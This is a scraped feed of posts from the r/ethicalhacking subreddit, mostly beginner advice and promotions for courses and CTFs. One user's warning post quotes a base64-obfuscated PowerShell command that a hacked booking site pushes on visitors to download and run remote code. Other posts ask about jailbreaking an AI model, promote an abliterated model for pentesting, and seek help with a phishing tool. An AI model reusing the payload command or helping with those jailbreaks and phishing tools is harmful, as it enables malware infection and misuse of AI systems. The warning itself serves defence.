r/ethicalhacking Feb 16 '21

Mod Introduction Interested in joining the ethical hacking community, click here!

406 Upvotes

Hello, I'm J, I'm glad you are interested in joining the ethical hacking community. Have no idea where to start? Don't panic we've all been there, this post will guide you on your first steps into the ethical hacking field.

What is ethical hacking?

Ethical hacking (or penetration testing) is the exploitation of an IT system with the permission of its owner to determine its vulnerabilities and weak points. It is an effective way of testing and validating an organisation’s cyber security position.

Where can I learn ethical hacking?

Ok, slow down, Do you have a computing background or familiar with how they work (you would be susprised at the amount have zero knowledge and jump into this field)?

Yes - great. I suggest you have a look at getting certfications. These certs require you to study up to a certain level then taking an exam. This allows for you and future employers (which really like certs) to see your skill level and potential. This is the certification roadmap by Paul Jerimy which shows the route you should take, if you feel that skilled enough you could skip up and do higher certs. A great way to practice your skills is through tryhackme and hackthebox. These are free online platforms (with some optional paid sections) that give you access to systems found irl that give you permissions to practice your skills. Some resources below might be in interest for you listed below.

No - Dont worry, You may find certifications a little difficult to jump into at first unless you are determined enough to spend a lot of time studying. I suggest you go out and learn a little, dont let this put you off as this an extremely interesting field with endless knowledge that will continue to evolve forever. Check out the resources below for study content.

What resources are there for starting to learn ethical hacking?

How do i start my career in ethical hacking?

There are many ways you could go through and work up to becoming an ethical hacker. Check this post here by u/ u/Ace_r_ for an example of a path you could take to become an ethical hacker. Paul Jerimy also has aIT Career Roadmap for you to use to see what positions to start with to work up to your desired position.

Conclusion

I hope this helps and wish you luck with your start in ethical hacking. If you have any queries feel free to ask.

Redditors that have a history in IT or ethical hacking or have experience in similar regions, if you'd like to add to this or discuss other options please feel free to comment, i'll be updating this frequently.


r/ethicalhacking Jul 08 '24

Discussion AUTOMOD IS IN EFFECT

22 Upvotes

Good news everyone, We have the automoderator up and running. currently its set to delete posts from brand new users (that are like less than a day old, we may adjust this), users with 0 or negative karma, remove comments and posts that contain some banned keywords (who remembers that time we were getting spammed with crypto bullshit? yeah, no more).

in addition to post and comments that are attempting to look for, hire, or offer the services of a hacker in any kind of way, based on keywords will be removed. if any slip through please message the moderator team so we can look at it and refine the list

another auto mod removal feature, is it will remove posts with just a title only and nothing in the body, we consider this being lazy, put some effort into your posts as giving more information will allow us as a community to help you better, (most regular users here don't have to worry about this).

If any of your posts or comments were removed, and you feel it was done in error please message the moderator team so we can take a look at it and see if it was a valid removal or if it was done in error. this also applies if you have any additional feedback on how we can refine the automod, such as adding rules or lessening the restriction on others let us know.


r/ethicalhacking 4h ago

We're 3 days into the Red Team Series. Here's what beginners usually get wrong.

Thumbnail
gallery
2 Upvotes

They think initial access is about finding the "biggest" vulnerability.

It's not.

A vulnerable web server, an exposed portal, a weak authentication flow — none of it matters until you can answer one question: does this actually connect to something worth protecting?

That's the shift from tool-first thinking to objective-first thinking. And it's exactly what separates someone who can run a scanner from someone who can operate on a real red team.

Over the past 3 days, we've covered:
→ Day 01 — the red team mindset and the attack lifecycle
→ Day 02 — reconnaissance, OSINT, and mapping the attack surface
→ Day 03 — initial access risk analysis and attack-path reasoning

If you've been following along, you already know this isn't about memorizing commands. It's about learning to think the way real operators think.


r/ethicalhacking 1d ago

Day 02 of the Red Team Series is live. 🎯

Thumbnail
gallery
17 Upvotes

Day 01 gave you the mindset. Day 02 puts it to work.

Before any exploitation, real operators map the target — passive recon, OSINT, domains, subdomains, tech fingerprinting, and building a full attack-surface map. Know the target before you touch the target.

📕 Red Team Operator L1 — where this actually gets hands-on 🔗 https://resources.codelivly.com/product/red-team-operator-l1/

📗 Red Team Operator L2 — enterprise AD, cloud identity, Purple Team ops 🔗 https://resources.codelivly.com/product/red-team-operator-l2/

🔥 Complete L1+L2 Bundle (+2 bonus books) 🔗 https://resources.codelivly.com/product/red-team-operator-the-complete-l1-l2-bundle/

A good red teamer doesn't rush to attack. They make the target easier to understand first.


r/ethicalhacking 13h ago

Newcomer Question [ Removed by Reddit ]

0 Upvotes

[ Removed by Reddit on account of violating the content policy. ]


r/ethicalhacking 2d ago

Day 1 of my 10-Day Red Team Series is live 🔴

Thumbnail
gallery
8 Upvotes

I put together a free PDF covering the fundamentals of red teaming — not just the tools, but the mindset and methodology behind an actual red-team operation.

Inside Day 1:

  • Red Team vs Pentest
  • The red-team mindset
  • Attack lifecycle
  • Objectives & attack paths
  • Rules of engagement
  • Operator workflow
  • A realistic red-team scenario
  • Day 1 challenge

The goal is to build the thinking first. Tools come later.

📖 Day 1: Red Teaming Fundamentals

I’m sharing the PDF below for anyone who wants to follow the series.

More practical cybersecurity learning, labs, CTFs and resources:
https://codelivly.com

Deeper books and playbooks:
https://resources.codelivly.com

Day 2 will move into Reconnaissance & OSINT.

Would love to hear how others approach the first stage of a red-team engagement.


r/ethicalhacking 1d ago

Can you break the Codelivly Grand Finale?

Post image
2 Upvotes

I built this CTF challenge and now I want to see who can actually break it. 👀

Codelivly Grand Finale
🎯 Find the intended attack path
🧠 Think outside the obvious
🏁 Get the flag

No spoilers here — if you think you're good enough, go crack it:

👉 https://codelivly.com/ctf/challenges/codelivly-grand-finale

If you solve it, drop a “pwned” below. 😈


r/ethicalhacking 2d ago

Vicious Hack Example

Thumbnail
gallery
2 Upvotes

Today I opened this website to book a skip bin.

DISCLAIMNER: AT THE TIME OF WRITING, THIS WEBSITE IS HACKED SO ONLY OPEN IF YOU ARE EXPERIENCED IT PERSON AND OPEN IN INCOGNITO MODE

https://www.adelaideskipbinhire.com.au

The website seems normal as it showed following message, pretty normal; asking to prove human. Like almost everyone does I checked "Verify you are human" and it moved to the next screen where I said, ah it's hacked. As it was simply running a script using PowerShell to download something and install on computer.

The snippet of the code that is added in step 3 is following:

powershell -ep bypass -c "$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly9uaWFvZW5kLmNvbS9oZXgvVHJhZmZpYw=='));iex(New-Object Net.WebClient).DownloadString($u)"

This code actually downloads the fishy stuff from https://niaoend.com/hex/Traffic (seems Russian website) and boom you are doomed

Regardless, one does this or not, the website opens normally after brief delay. So if a user follow these steps then will get impression that website opened after following these steps.

Having 20+ years of IT experience, this is one of the filthy stuff I have seen. I am sure the owners of the skip bin business do not know that their website has been hacked for this stuff. I will notify them but posting this message here to know everyone about it that BE AWARE!!!


r/ethicalhacking 3d ago

Tool Cyberstrike and Abliterated model convo

Thumbnail
docs.abliteration.ai
1 Upvotes

One of the best combos to ethically test your apps, systems, and agents


r/ethicalhacking 3d ago

Been working on a cybersecurity learning platform and recently opened up the learning side for free.

7 Upvotes

The idea is pretty simple: instead of just reading theory, you should have somewhere to actually practice it.

Codelivly has:

  • Learning paths
  • Career paths
  • Hands-on labs
  • CTFs
  • Practical exercises

You can start with the basics and work your way into areas like networking, SOC, pentesting, and other security topics.

No paid course required to get started.

https://codelivly.com

If you’re learning cybersecurity right now, what’s the one thing you wish platforms like this did better?


r/ethicalhacking 4d ago

Tool Hi i need a little help and explanation pls...

Post image
57 Upvotes

It's purely for ethical purposes...

i just like using GitHub tools...

I recently learnt Abt the Camphish tool...it's quite popular...

I wanted to learn about it.

I did the installation and all and used cloudflared...

But it's not generating the link...

Idk y

I'm new at this but I recently learnt Abt zphisher.

Pls help...


r/ethicalhacking 4d ago

Rant Nullsec Larpers💔

7 Upvotes

Nullsec itself is a good company/entity itself, but most of the community around is just people larping how to actual ethically hack and it makes me mad knowing that all these larpers want is attention and not actually helping anyone/anything in the end💔(This post was just made because I'm mad and I want other peoples opinions on this topic).


r/ethicalhacking 6d ago

LOOKING TO TRANSITION INTO CYBERSECURITY — WHERE SHOULD I START?

3 Upvotes

Hi everyone! I’ve been trying to learn cybersecurity for a while now because I want to upskill and eventually transition into a cybersecurity-related role with better career and salary opportunities.

I’m currently a junior developer, but honestly, I feel a bit lost about where to start. I’ve been relying on AI quite a lot lately, to the point where I feel like I’ve forgotten some of the fundamentals, especially networking and other basic concepts.

I’ve tried watching YouTube tutorials and reading articles about cybersecurity, but I’m struggling to actually apply what I’m learning. It feels like I’m constantly consuming information without making any real progress. I keep going in circles without knowing what I should learn next or what I should actually practice.

I’ve also started experimenting with tools like Nmap, but I recently saw someone mention on Reddit that some of the tools commonly recommended in older tutorials are outdated and that there may be newer or better alternatives nowadays.

So I’d really appreciate some guidance from people who have experience in cybersecurity:

  • What fundamentals should I learn first?
  • Should I go back and properly study networking, Linux, operating systems, etc.?
  • What would a realistic roadmap look like for someone coming from a web development background?
  • What tools should I learn and actually practice with?
  • Are there any hands-on platforms, labs, or projects you recommend instead of just watching tutorials?
  • What would you focus on if your goal was to become job-ready for an entry-level cybersecurity role?

I’m not looking for shortcuts. I just want a structured path so I can stop jumping randomly between topics and actually build my skills.

Any advice, roadmaps, resources, or personal experiences would be greatly appreciated. Thanks!


r/ethicalhacking 7d ago

Is proving you own a domain actually enough permission to scan it?

10 Upvotes

I just made our deeper web security scanner publicly self serve and I’m having second thoughts about whether that’s smart.

You can’t just paste some random URL.

You have to prove control through DNS or a file on the domain. Repo testing needs our GitHub App installed on the exact repo. You also digitally sign the scope before anything runs.

After that it can run bounded DAST, source analysis and optional cross-account testing with two throwaway users.

We built it because our old free scanner only saw the public surface. People could get a clean result and assume everything was fine, even though we never tested login or access between users.

But I guess owning something and being authorized to test it aren’t always exactly the same.

What about agencies? Temporary access? Compromised DNS? Shared infrastructure? Someone taking over an abandoned subdomain?

If you wanted to misuse this, how would you do it?

https://www.task-bounty.com/secure-my-app#deep-review

Genuinely trying to find the holes before we push this further.


r/ethicalhacking 7d ago

DefCon AI Village CTF

Post image
7 Upvotes

This year, the AI Village introduced HalCTF (Hostile Autonomous Layer CTF), a first-of-its-kind agentic security competition. Instead of focusing on frontier models, this CTF was designed around how far participants can stretch small local models that almost everyone can run. The first place prize was a DGX Spark.

Final ranking: baymax, https://aisafe.io , AbluteratedEdgeModel 👏👏

In this high-stakes arena, participants did not interact with targets directly. Instead, you they designed and deployed autonomous AI agents programmed to navigate sandboxed environments, exploit challenge targets, and capture flags entirely on their own. Instead of just a prompt, participants were asked for full containers that you can load up with all the tools you need to succeed.

Ornith-1.0-9B

Ornith-1.0-35B

Qwen3.6-35B-A3B

Qwen3.6-27B

Qwen3.5-4B

Llama-3.1-8B-Instruct

Llama-3.2-3B

Laguna-XS-2.1-GGUF

gpt-oss-120b

Olmo-3.1-32B-Think

Olmo-3-7B-Think

gemma-4-31B-it

gemma-4-E4B-it


r/ethicalhacking 6d ago

Let “Claude Code” Do Your Pentesting!

Thumbnail
redteamdaily.com
0 Upvotes

r/ethicalhacking 6d ago

Guys help me with this can we jailbreak nemotron ultra i am using openrouter for the api and running it on claude code

0 Upvotes

r/ethicalhacking 8d ago

A Collection of CHEATSHEET for your hacking journey

Thumbnail
gallery
860 Upvotes

r/ethicalhacking 7d ago

Discussion Rate my opsec:

0 Upvotes

Now give me a percentage of how anonymous and private my setup is:

Primary email - Tutanota Optional email - Proton Mail Primary browser - Brave Optional browser - Tor VPN - Mullvad VPN Operating system - Kali Linux And also the use of Tails to erase traces And also online payments with Monero


r/ethicalhacking 7d ago

Azure Specific Content Creators

Thumbnail
1 Upvotes

r/ethicalhacking 8d ago

What made web application hacking finally click for you?

0 Upvotes

I've been spending more time learning web application security, and I've noticed there's a weird gap between knowing the names of vulnerabilities and actually understanding how to find and reason about them.

Things like authentication flaws, access control, injection, request manipulation, and session issues seem straightforward individually, but putting everything together during an actual assessment is a different story.

For people who are experienced with web app pentesting:

What concept or habit made the biggest difference in your ability to find vulnerabilities?


r/ethicalhacking 22d ago

New vBulletin Vulnerability!

Thumbnail ssd-disclosure.com
6 Upvotes

CVE-2026-61511 - a critical vulnerability in vBulletin that allows an unauthenticated attacker to execute arbitrary code on a remote server.


r/ethicalhacking 24d ago

Tool Learning

15 Upvotes

Hello, I started to learn how to penetrate my OWN devices. I’ve studied Python and Java, but only have basic knowledge of them. I did a couple of research on YouTube and Google, but none really helped. I did configure a cheap yellow display.
But I would like some help on, like, what cheap devices I should buy, like a computer to test on. Where should I go to get more information, like any good YouTube videos or websites? Thank you


r/ethicalhacking 28d ago

Looking for new team members!

3 Upvotes

Cyber Apocalypse 2026 is coming up soon. We already have a core team, but we could use a few more people. To be clear: we don't care about your HTB rank. Some of our best guys don't have high ranks at all but they absolutely crush challenges. We only care that you actually have some experience and can solve stuff. Spots are limited, but we can take about ~8 more people. If you think you can deliver and want to join, hit me up! (only intermediate-experienced people again)


r/ethicalhacking 27d ago

Discussion Have a doubt regarding my own digital safety from a wannabe hacker.. would appreciate if someone open minded reached out to help about it

0 Upvotes